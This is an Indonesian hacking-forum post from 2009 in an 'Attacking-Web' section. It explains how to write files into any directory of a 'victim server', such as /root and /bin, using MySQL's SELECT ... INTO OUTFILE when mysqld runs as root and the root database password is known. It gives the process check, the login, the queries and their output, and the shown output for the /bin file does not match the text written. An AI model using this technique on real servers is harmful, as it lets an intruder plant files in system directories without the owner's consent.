We Are DevilzCrew
 
IndeksPendaftaranLogin

Share | 
 

 Cara menulis di direktori manapun di server |syarat: mysqld run as root

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
sh3llc0der
Pengunjung
Pengunjung


Jumlah posting : 8
Join date : 13.07.09

PostSubyek: Cara menulis di direktori manapun di server |syarat: mysqld run as root   Wed Jul 15, 2009 4:00 pm

Cara menulis di direktori manapun di server tanpa dibatasi permisi file

ok ni ada dikit trik cara gampang di mana kita bisa nulis di direktori manapun di server korban bahkan bisa di direktori /root maupun /bin

dalam kasus kali ini mysqld harus run as root

utk mengecek apa mysqld run as root:

Code:

$ ps aux | grep mysqld
root      3977  0.0  4.7 127000 23936 pts/0    Sl  04:13  0:00                                                                                    /opt/lampp/sbin/mysqld --basedir=/opt/lampp --datadir=/opt/lamp                                                                                  p/var/mysql --user=nobody --pid-file=/opt/lampp/var/mysql/bt.pid                                                                                    --skip-external-locking --port=3306 --socket=/opt/lampp/var/mys                                                                                  ql/mysql.sock

yup dah keliatan tuh yg run mysqld adl root bukanya mysql loh !!! hehehe


ok langsung aja kita tes asiknya kalo udah kek gini, misal kita tau password root mysqlnya langsung ja ketik:

Code:

mysql -u root -h localhost -p
password: ***ketik_password_root_mysql***

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.0.67 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>



ok misal kita mao kasih pesan ke rootnya dg sebuah file bernama:

hai_root_baca_nih.txt

dg isi file:

halo om root halo salam kenal


langsung ja:

Code:

mysql>select 'halo om root halo salam kenal' into outfile '/root/hai_root_baca_nih.txt';
Query OK, 1 row affected (0.29 sec)


trus juga kita bikin di direktori /bin

Code:

mysql>select 'halo om root gue becanda doang kok jangan marah ya ! hahahaha' into outfile '/bin/hai_root_baca_nih.txt';
Query OK, 1 row affected (0.29 sec)

Code:

sh3llc0der@bt:/opt/lampp/bin$ cat /bin/hai_root_baca_nih.txt
halo om root halo salam kenal
sh3llc0der@bt:/opt/lampp/bin$ 
Kembali Ke Atas Go down
 
Cara menulis di direktori manapun di server |syarat: mysqld run as root
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» ganti warna motor
» Cara Browsing lewat ubuntu server
» cara mudah donlod video youtube tanpa software!
» [Private Server] Zodiac Ragnarok
» [ASK] Gimana cara yang baik buat cuci helmet..??

Permissions in this forum:Anda tidak dapat menjawab topik
Devilzc0de TeaM :: Computer :: Attacking-Web-
Navigasi: